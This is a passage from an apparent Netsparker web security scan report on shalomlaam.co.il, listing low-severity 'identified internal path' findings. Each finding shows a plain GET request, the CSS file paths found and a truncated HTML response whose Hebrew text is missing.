<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.2. /lessons/
http://www.shalomlaam.co.il/lessons/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /lessons/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
111 / 146
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.3. /sipur/page.asp
http://www.shalomlaam.co.il/sipur/page.asp?id=44
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /sipur/page.asp?id=44 HTTP/1.1
Referer: http://www.shalomlaam.co.il/sipur/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.4. /alon/musag.asp
http://www.shalomlaam.co.il/alon/musag.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /alon/musag.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.5. /l/agrala_tozaot.asp
http://www.shalomlaam.co.il/l/agrala_tozaot.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
112 / 146
Certainty
Request
GET /l/agrala_tozaot.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/l/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.6. /2minute/
http://www.shalomlaam.co.il/2minute/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /2minute/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.7. /search/
http://www.shalomlaam.co.il/search/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /search/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

113 / 146
18.8. /video/Default.asp
http://www.shalomlaam.co.il/video/Default.asp?id=518
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /video/Default.asp?id=518 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/video/?id=518
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

,,,'>
<meta name="Description" CONTENT=" , , ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.9. /pages/Default.asp
http://www.shalomlaam.co.il/pages/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /pages/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/pages/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.10. /
http://www.shalomlaam.co.il/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET / HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Accept-Encoding: gzip, deflate
114 / 146
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.11. /LIVE/
http://www.shalomlaam.co.il/LIVE/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /LIVE/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

,'>
<meta name="Description" CONTENT=" - , , , , , ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.12. /vod/vod.asp
http://www.shalomlaam.co.il/vod/vod.asp?id=1763
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /vod/vod.asp?id=1763 HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.13. /alon/mador.asp
http://www.shalomlaam.co.il/alon/mador.asp?CatId=6
Identified Internal Path(s)
/home/1.css
/home/home_page.css
115 / 146
Certainty
Request
GET /alon/mador.asp?CatId=6 HTTP/1.1
Referer: http://www.shalomlaam.co.il/alon/list.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.14. /bmidrash/mekorot.asp
http://www.shalomlaam.co.il/bmidrash/mekorot.asp?id=1087
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /bmidrash/mekorot.asp?id=1087 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/bmidrash/mekorot.asp?id=1087
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.15. /Default.asp
http://www.shalomlaam.co.il/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

116 / 146
18.16. /alon/
http://www.shalomlaam.co.il/alon/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /alon/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.17. /Branches/snif.asp
http://www.shalomlaam.co.il/Branches/snif.asp?id=28
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /Branches/snif.asp?id=28 HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

TENT=" (2010), . ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.18. /pages/
http://www.shalomlaam.co.il/pages/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /pages/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
117 / 146
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.19. /gallery/branches.asp
http://www.shalomlaam.co.il/gallery/branches.asp?id=28
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /gallery/branches.asp?id=28 HTTP/1.1
Referer: http://www.shalomlaam.co.il/Branches/snif.asp?id=28
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

TENT=" (2010), . ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.20. /l/Default.asp
http://www.shalomlaam.co.il/l/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /l/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/l/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.21. /contact/
http://www.shalomlaam.co.il/contact/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
118 / 146
Certainty
Request
GET /contact/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.22. /contact/Default.asp
http://www.shalomlaam.co.il/contact/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /contact/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.23. /about/Default.asp
http://www.shalomlaam.co.il/about/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /about/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/about/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

e="Description" CONTENT=" ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

119 / 146
18.24. /gallery/Default.asp
http://www.shalomlaam.co.il/gallery/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /gallery/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/gallery/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

,,,,,,,,,'>
<meta name="Description" CONTENT=" ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.25. /news/Default.asp
http://www.shalomlaam.co.il/news/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /news/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/news/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.26. /l/agrala_takanon.asp
http://www.shalomlaam.co.il/l/agrala_takanon.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
120 / 146
Request
GET /l/agrala_takanon.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/l/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.27. /news/
http://www.shalomlaam.co.il/news/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /news/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.28. /about/
http://www.shalomlaam.co.il/about/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /about/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

e="Description" CONTENT=" ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

121 / 146
18.29. /live/form_live.asp
http://www.shalomlaam.co.il/live/form_live.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /live/form_live.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/LIVE/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">


<link rel="icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<title> - LIVE</title>
<meta name="Author" CONTENT="shalomlaam.co.il">

18.30. /sipur/Default.asp
http://www.shalomlaam.co.il/sipur/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /sipur/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/sipur/
